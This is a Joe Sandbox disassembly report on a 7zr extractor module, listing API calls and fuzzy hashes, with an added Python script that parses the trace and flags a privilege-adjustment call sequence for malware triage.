                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: cc7d75185353fbfe6b620e673f9782b4e7475c6cdc410b298fbf8dd35051ac6c
                                    • Instruction ID: 2cc64252ee60e4f53edca341014eb72fdbdd9b736c84212666997e84300afca6
                                    • Opcode Fuzzy Hash: cc7d75185353fbfe6b620e673f9782b4e7475c6cdc410b298fbf8dd35051ac6c
                                    • Instruction Fuzzy Hash: 34F1DE70904789CFCF25CF64D590AAABBF1BF18308F54486EE48A9B291D731BDA4CB51
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A04255
                                      • Part of subcall function 00A0440B: __EH_prolog.LIBCMT ref: 00A04410
                                      • Part of subcall function 009F1E0C: malloc.MSVCRT ref: 009F1E1F
                                      • Part of subcall function 009F1E0C: _CxxThrowException.MSVCRT(?,00AA4B28), ref: 009F1E39
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ExceptionThrowmalloc
                                    • String ID:
                                    • API String ID: 3744649731-0
                                    • Opcode ID: 3de10be56260c9cae1e58860a1536d41e0f0c90e98238a21b7e3514df14272fb
                                    • Instruction ID: a6efe750ce0883a7efbb7d60035854a7bbf569d787028c55dfd981d301874070
                                    • Opcode Fuzzy Hash: 3de10be56260c9cae1e58860a1536d41e0f0c90e98238a21b7e3514df14272fb
                                    • Instruction Fuzzy Hash: 795107B0501B48CFC725DF69C18469AFFF0BF19304F5488AEC19A9B752D7B0A648CB61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 56702716d12d2e0fe80fc26704810a85f40bfdfb2b72efb40b8f3bae6974755d
                                    • Instruction ID: efeff465ad667b75cb91536c7ec81cc35ae2c6c2b1b096a09575d0a4b171cfae
                                    • Opcode Fuzzy Hash: 56702716d12d2e0fe80fc26704810a85f40bfdfb2b72efb40b8f3bae6974755d
                                    • Instruction Fuzzy Hash: 6D311CB1D00219EFCB14EF95C991CEEBBB5FF94364B20851EE42A67251C7B49D81CBA0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A1021F
                                      • Part of subcall function 00A03D66: __EH_prolog.LIBCMT ref: 00A03D6B
                                      • Part of subcall function 00A03D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03D7D
                                      • Part of subcall function 00A03D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03D94
                                      • Part of subcall function 00A03D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00A03DB6
                                      • Part of subcall function 00A03D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03DCB
                                      • Part of subcall function 00A03D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03DD5
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID:
                                    • API String ID: 1532160333-0
                                    • Opcode ID: 4d2b4b5f3b62686f6fe2747bb31c8213ae87d161bd4688fc784e4d02290cc2af
                                    • Instruction ID: d6802559de0e354ec1834c1942affdb036ded9e0c9f8cfe543ad25974326284c
                                    • Opcode Fuzzy Hash: 4d2b4b5f3b62686f6fe2747bb31c8213ae87d161bd4688fc784e4d02290cc2af
                                    • Instruction Fuzzy Hash: 96214AB1946B90CFC721CF6B82D1686FFF4BB19600B94996EC0DA83B12C770A548CF55
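
The subcall at 00A03D66 listed above is the textbook token-privilege sequence: open the current process token, resolve a privilege name to a LUID, then AdjustTokenPrivileges, followed by GetLastError. Two things are worth pulling out of the raw trace. The DesiredAccess slot 00000028 decodes to TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, the minimum needed to enable a privilege, and the privilege is SeSecurityPrivilege, which governs SACL access and the security event log. The GetLastError call matters because AdjustTokenPrivileges returns TRUE even when the privilege was not granted (ERROR_NOT_ALL_ASSIGNED), so a caller that does not check it cannot tell whether it actually holds the privilege. The snapshot name identifies this module as the bundled 7zr extractor, and archivers and installers legitimately toggle privileges, so the pattern is a triage lead rather than a verdict on its own. The script below is an added example for this page, not Joe Sandbox or 7-Zip code: it parses trace lines copied verbatim from the entry above, decodes the access mask, and reports the sequence. The line regex, the handling of unresolved `?` slots, and the reading of stack slots by documented parameter position are assumptions about the trace format.

```python
"""Parse the per-function API lists of a Joe Sandbox IDA-plugin report and
flag the token-privilege-adjustment sequence.

Added example for this page, not Joe Sandbox or 7-Zip code. The sample
lines are copied from the report entry above; the line format, the
handling of '?' slots and the slot-to-parameter mapping (taken from the
documented Win32 signatures) are assumptions about the trace format.
"""
import re
from typing import Dict, List, Optional

# Copied verbatim from the report's API list for the function at 00A1021F.
SAMPLE_TRACE = """\
• __EH_prolog.LIBCMT ref: 00A1021F
• Part of subcall function 00A03D66: __EH_prolog.LIBCMT ref: 00A03D6B
• Part of subcall function 00A03D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03D7D
• Part of subcall function 00A03D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03D94
• Part of subcall function 00A03D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00A03DB6
• Part of subcall function 00A03D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03DCB
• Part of subcall function 00A03D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00A03DD5
"""

# Optional bullet and "Part of subcall function <addr>:" prefix (assumed format).
PREFIX_RE = re.compile(r"^•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?")
# "<api>.<module>(<args>), ref: <addr>"; CRT helpers such as __EH_prolog carry no arg list.
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# TOKEN_* access-mask bits from winnt.h.
TOKEN_ACCESS_BITS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE", 0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}


def parse_trace(text: str) -> List[Dict[str, object]]:
    """Parse trace lines into call records; lines not in the format are skipped."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        pre = PREFIX_RE.match(line)
        m = CALL_RE.match(line[pre.end():])
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": m.group("ref"),
            "subcall": pre.group("sub"),
        })
    return calls


def slot_value(slot: str) -> Optional[int]:
    """Hex stack slot to int; '?' means the plugin could not resolve the value."""
    return None if slot == "?" else int(slot, 16)


def decode_token_access(mask: int) -> List[str]:
    """Expand an OpenProcessToken DesiredAccess mask into TOKEN_* flag names."""
    names = [n for bit, n in TOKEN_ACCESS_BITS.items() if mask & bit]
    rest = mask & ~sum(TOKEN_ACCESS_BITS)
    if rest:
        names.append(hex(rest))  # bits outside the TOKEN_* range stay visible
    return names


def find_privilege_adjustment(calls) -> Optional[Dict[str, object]]:
    """Return details if OpenProcessToken -> LookupPrivilegeValue{A,W} ->
    AdjustTokenPrivileges occur in that order, else None.

    Slots are read by documented parameter position (assumption):
    OpenProcessToken(hProcess, DesiredAccess, ...) and
    LookupPrivilegeValue(lpSystemName, lpName, lpLuid). AdjustTokenPrivileges
    returns TRUE even when the privilege was not granted (ERROR_NOT_ALL_ASSIGNED),
    so whether a GetLastError call follows it is recorded as well.
    """
    want = ("OpenProcessToken", "LookupPrivilegeValue", "AdjustTokenPrivileges")
    found, step = {}, 0
    for i, c in enumerate(calls):
        base = re.sub(r"[AW]$", "", c["api"])  # fold the ANSI/Unicode suffix
        if step < len(want) and base == want[step]:
            found[want[step]] = (i, c)
            step += 1
    if step < len(want):
        return None
    open_args = found["OpenProcessToken"][1]["args"]
    lookup_args = found["LookupPrivilegeValue"][1]["args"]
    adjust_idx = found["AdjustTokenPrivileges"][0]
    access = slot_value(open_args[1]) if len(open_args) > 1 else None
    return {
        "privilege": lookup_args[1] if len(lookup_args) > 1 else "?",
        "desired_access": decode_token_access(access) if access is not None else ["?"],
        "refs": [found[k][1]["ref"] for k in want],
        "checks_result": any(c["api"] == "GetLastError" for c in calls[adjust_idx + 1:]),
    }


if __name__ == "__main__":
    print(find_privilege_adjustment(parse_trace(SAMPLE_TRACE)))
```

Running it on the entry above yields SeSecurityPrivilege requested with TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES at refs 00A03D94, 00A03DB6 and 00A03DCB, with a GetLastError check present. Slots beyond an API's documented parameter count (the seven values logged for the zero-argument GetCurrentProcess, for instance) are stack content, not parameters, and the parser deliberately does not interpret them.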
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A2C0B8
                                      • Part of subcall function 00A17193: __EH_prolog.LIBCMT ref: 00A17198
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$free
                                    • String ID:
                                    • API String ID: 2654054672-0
                                    • Opcode ID: 41fc52114b5e748d73c10fd6ba0acacfb503873e4a5a881dcc523d742406ca44
                                    • Instruction ID: 765bcd889c9dbd6c4d5f12c033e35f5721c3980d211bad0fb419d40cf8fa1eb4
                                    • Opcode Fuzzy Hash: 41fc52114b5e748d73c10fd6ba0acacfb503873e4a5a881dcc523d742406ca44
                                    • Instruction Fuzzy Hash: 00F0B472A04225DBDB259B49E9417AEF3A9EF54760F20013FE50597612CBB19C408694
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A30364
                                      • Part of subcall function 00A301C4: __EH_prolog.LIBCMT ref: 00A301C9
                                      • Part of subcall function 00A30143: __EH_prolog.LIBCMT ref: 00A30148
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                      • Part of subcall function 00A303D8: __EH_prolog.LIBCMT ref: 00A303DD
                                      • Part of subcall function 00A3004A: __EH_prolog.LIBCMT ref: 00A3004F
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$free
                                    • String ID:
                                    • API String ID: 2654054672-0
                                    • Opcode ID: 19acecdf7342cb29e6ee8a7899e5e100832421161614807fc4c32d3bdc40a705
                                    • Instruction ID: c4977e8a765bfa437501962bdeab5fb3c1b946aeaa87fccb15832ccb86cf76de
                                    • Opcode Fuzzy Hash: 19acecdf7342cb29e6ee8a7899e5e100832421161614807fc4c32d3bdc40a705
                                    • Instruction Fuzzy Hash: 77F02830914B54DFCB19FB68D5227ADBBE4EF00314F10465DF056632D2CBB45B048749
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 8e4c78a7fb1d3e78bba8e71866b33d77047bbb533cd9f6f4c9a7767c415cb53e
                                    • Instruction ID: cce0a1fdcad37e3e077e52c382bbdf1b36a5b26c4d819d291561f6e2b970c3da
                                    • Opcode Fuzzy Hash: 8e4c78a7fb1d3e78bba8e71866b33d77047bbb533cd9f6f4c9a7767c415cb53e
                                    • Instruction Fuzzy Hash: 45F04F72E1112AABCB14EF98D9549AFBB75FF84750B10816AF415E7251CB348A05CB90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID:
                                    • API String ID: 1795875747-0
                                    • Opcode ID: 486f3eb9aa2f7cdf845f3294b94af579fe25db06e95536260e183fccc9cd794d
                                    • Instruction ID: 00f565838dc565182059c4af997c5da846bf3923f9221dd9e3411acae20b6138
                                    • Opcode Fuzzy Hash: 486f3eb9aa2f7cdf845f3294b94af579fe25db06e95536260e183fccc9cd794d
                                    • Instruction Fuzzy Hash: 17D0123250411DABCF156BD4DC05CDD77BCEF08254710441BF545E2150EA75E51587A4
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A480AF
                                      • Part of subcall function 009F1E0C: malloc.MSVCRT ref: 009F1E1F
                                      • Part of subcall function 009F1E0C: _CxxThrowException.MSVCRT(?,00AA4B28), ref: 009F1E39
                                      • Part of subcall function 00A3BDB5: __EH_prolog.LIBCMT ref: 00A3BDBA
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: H_prolog$ExceptionThrowmalloc
                                    • String ID:
                                    • API String ID: 3744649731-0
                                    • Opcode ID: 907fae80e69523663cd4ad6624aff531008f1403b56898bc4b5ec35385d7bda4
                                    • Instruction ID: 9f60761fe5b9ca6261a9f77d9ccb1177a2068f4874d48bf7d72224f5110f21c9
                                    • Opcode Fuzzy Hash: 907fae80e69523663cd4ad6624aff531008f1403b56898bc4b5ec35385d7bda4
                                    • Instruction Fuzzy Hash: F1D01771B11105AFDF08EBB8A52676E72E1AB84340F00457DA016E2681EF7489008660
                                    APIs
                                    • FindClose.KERNELBASE(00000000,?,009F6880), ref: 009F6853
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 37b3a01e585993e5d713578495e08b0e81a5733da1e95c1f894039479fb89748
                                    • Instruction ID: d7c925bf9e2454fea484d1545aa2a470d5605b6f8ba6c8aa53f5869e8ab759bd
                                    • Opcode Fuzzy Hash: 37b3a01e585993e5d713578495e08b0e81a5733da1e95c1f894039479fb89748
                                    • Instruction Fuzzy Hash: F5D0123110472146CA645E7D78449E53BDC6E06378331075EF0B0C31E1D7618C835750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs
                                    • String ID:
                                    • API String ID: 1795875747-0
                                    • Opcode ID: 592cb9da6c12cbc6aef11620fb26d0c25090bc1f5e807427714e5afbce5555c1
                                    • Instruction ID: c1d87e518bca3c41ccfcd6bd0c19a7834e6b3ce301882792f4c0623f17f0c907
                                    • Opcode Fuzzy Hash: 592cb9da6c12cbc6aef11620fb26d0c25090bc1f5e807427714e5afbce5555c1
                                    • Instruction Fuzzy Hash: CAD0C937108251AFD625AF45EC09C8BBBA5FFD5330725082FF484921609F626C25DAA4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: memmove
                                    • String ID:
                                    • API String ID: 2162964266-0
                                    • Opcode ID: 936375aea008d9b160e0bc1e955f70934edf93ae43960a694541c865fdd6582f
                                    • Instruction ID: 3c4eab65b305df322f893c564580a12f9439bec983c482bf764b547322271b00
                                    • Opcode Fuzzy Hash: 936375aea008d9b160e0bc1e955f70934edf93ae43960a694541c865fdd6582f
                                    • Instruction Fuzzy Hash: BD812EB1D0824EAFCF14CFA8C684AFEBBB5AF48304F14C469E611A7241D775AA84CF50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                    • Instruction ID: 5d67d45f889917420feabe9fa297392b382477ea15f3b3fac3f508b3308b3d6b
                                    • Opcode Fuzzy Hash: f6689b844a0abd90852679766297054ea5ad023363036feb97c819a96c7c6895
                                    • Instruction Fuzzy Hash: A2D022B2243A0206CF484F304C0AB2B30842FC130AF28C8BCE81BCB681FB28C2188248
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000), ref: 00A76B31
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: fc8a1f4e083a9aa6c435fc09e8b70d9caca13e6c2401f3b95e2c28e1efc3c361
                                    • Instruction ID: 1818c43c4dda68e4e2c454ed823b419a00ec5d2010431c384d6c9b19b16994ed
                                    • Opcode Fuzzy Hash: fc8a1f4e083a9aa6c435fc09e8b70d9caca13e6c2401f3b95e2c28e1efc3c361
                                    • Instruction Fuzzy Hash: A7C08CE1A4D280DFDF0253508C407603B308B83300F0A00C2E4045B092C6041809C722
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                    • Instruction ID: 1d054a7e450302e399c6c0f5249f1bb3d173dd5adc694076d5f15cc8347a81fd
                                    • Opcode Fuzzy Hash: a1e9458a9ade6dcfe768eb88d97769c87549e2230f9edfc2c16aad58367e7da2
                                    • Instruction Fuzzy Hash: 32A024C551104101DD1C33303C017173000135030F7C0C4FC7705C0101F715C1041005
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: malloc
                                    • String ID:
                                    • API String ID: 2803490479-0
                                    • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                    • Instruction ID: 8077a48b9f1ad3ada3fec633518d4a7ebbacffda4665d76e9728f90a74362e1a
                                    • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                    • Instruction Fuzzy Hash: 24A022CCF0200202EE0832383C02BA32033B3F0B0EBE8C8B8B8088020AFF28C0083003
                                    APIs
                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A76BAC
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                     • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmp
                                     • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 3cc7c2eb240ccbfda306358047fe3fecb941c81deab691efe8bf322a0b8134e4
                                    • Instruction ID: c1205b5edf0e501637edc10c134161863686bde6bd8dc761ec6f6eeadd0b22b5
                                    • Opcode Fuzzy Hash: 3cc7c2eb240ccbfda306358047fe3fecb941c81deab691efe8bf322a0b8134e4
